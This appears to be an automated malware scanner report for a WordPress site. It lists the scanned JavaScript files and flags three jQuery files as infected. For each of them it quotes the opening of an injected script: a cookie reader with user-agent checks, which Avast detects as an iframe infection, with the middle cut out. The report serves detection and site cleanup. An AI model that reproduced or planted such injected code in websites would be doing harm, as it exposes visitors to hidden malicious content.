New scan:

Malware Scanner report for ff-bonstetten.de

Malicious/Suspicious/Total urls checked
3/0/15
3 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "ff-bonstetten.de" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/9
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ff-bonstetten.de

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.ff-bonstetten.de/
200 OK
Content-Length: 63371
Content-Type: text/html
clean
http://www.ff-bonstetten.de/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/ajax.js?ver=4.0
200 OK
Content-Length: 33
Content-Type: application/x-javascript
clean
http://www.ff-bonstetten.de/wp-includes/js/jquery/jquery.js?ver=1.11.1
200 OK
Content-Length: 96871
Content-Type: application/x-javascript
clean
http://www.ff-bonstetten.de/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
200 OK
Content-Length: 8264
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t
... 3221 bytes are skipped ...
ector||"**",n),this)},e.event.trigger=function(e,t,n,a){return n||C.test(e)||r("Global events are undocumented and deprecated"),k.call(this,e,t,n||document,a)},e.each(S.split("|"),function(t,n){e.event.special[n]={setup:function(){var t=this;return t!==document&&(e.event.add(document,n+"."+e.guid,function(){e.event.trigger(n,null,t,!0)}),e._data(this,n,e.guid++)),!1},teardown:function(){return this!==document&&e.event.remove(document,n+"."+e._data(this,n)),!1}}})}(jQuery,window);

Antivirus reports:

Avast
HTML:Iframe-inf

http://www.ff-bonstetten.de/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/persist.js?ver=4.0
200 OK
Content-Length: 24995
Content-Type: application/x-javascript
clean
http://www.ff-bonstetten.de/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/store.js?ver=4.0
200 OK
Content-Length: 5337
Content-Type: application/x-javascript
clean
http://www.ff-bonstetten.de/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/ngg_store.js?ver=4.0
200 OK
Content-Length: 891
Content-Type: application/x-javascript
clean
http://www.ff-bonstetten.de/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/lightbox/static/lightbox_context.js?ver=4.0
200 OK
Content-Length: 890
Content-Type: application/x-javascript
clean
http://www.ff-bonstetten.de/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20
200 OK
Content-Length: 16312
Content-Type: application/x-javascript
clean
http://www.ff-bonstetten.de/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.9.3
200 OK
Content-Length: 10722
Content-Type: application/x-javascript
clean
http://www.ff-bonstetten.de/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.10.4
200 OK
Content-Length: 5353
Content-Type: application/x-javascript
clean
http://www.ff-bonstetten.de/wp-includes/js/jquery/ui/jquery.ui.widget.min.js?ver=1.10.4
200 OK
Content-Length: 7585
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t
... 3119 bytes are skipped ...
())}},e.each({show:"fadeIn",hide:"fadeOut"},function(t,i){e.Widget.prototype["_"+t]=function(s,n,a){"string"==typeof n&&(n={effect:n});var r,o=n?n===!0||"number"==typeof n?i:n.effect||i:t;n=n||{},"number"==typeof n&&(n={duration:n}),r=!e.isEmptyObject(n),n.complete=a,n.delay&&s.delay(n.delay),r&&e.effects&&e.effects.effect[o]?s[t](n):o!==t&&s[o]?s[o](n.duration,n.easing,a):s.queue(function(i){e(this)[t](),a&&a.call(s[0]),i()})}})})(jQuery);

Antivirus reports:

Avast
HTML:Iframe-inf

http://www.ff-bonstetten.de/wp-includes/js/jquery/ui/jquery.ui.tabs.min.js?ver=1.10.4
200 OK
Content-Length: 12687
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t
... 3109 bytes are skipped ...
load",i,h)},1)}).complete(function(t,e){setTimeout(function(){"abort"===e&&n.panels.stop(!1,!0),a.removeClass("ui-tabs-loading"),r.removeAttr("aria-busy"),t===n.xhr&&delete n.xhr},1)})))},_ajaxSettings:function(e,i,s){var n=this;return{url:e.attr("href"),beforeSend:function(e,a){return n._trigger("beforeLoad",i,t.extend({jqXHR:e,ajaxSettings:a},s))}}},_getPanelForTab:function(e){var i=t(e).attr("aria-controls");return this.element.find(this._sanitizeSelector("#"+i))}})})(jQuery);

Antivirus reports:

Avast
HTML:Iframe-inf

http://www.ff-bonstetten.de/wp-content/themes/news/js/news-theme.js?ver=20120825
200 OK
Content-Length: 44693
Content-Type: application/x-javascript
clean
http://www.ff-bonstetten.de/wp-content/themes/news/library/js/drop-downs.js?ver=20110920
200 OK
Content-Length: 5278
Content-Type: application/x-javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: ff-bonstetten.de

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ff-bonstetten.de
Referer: http://www.google.com/search?q=ff-bonstetten.de

Result:
The result is similar to the first query. There are no suspicious redirects found.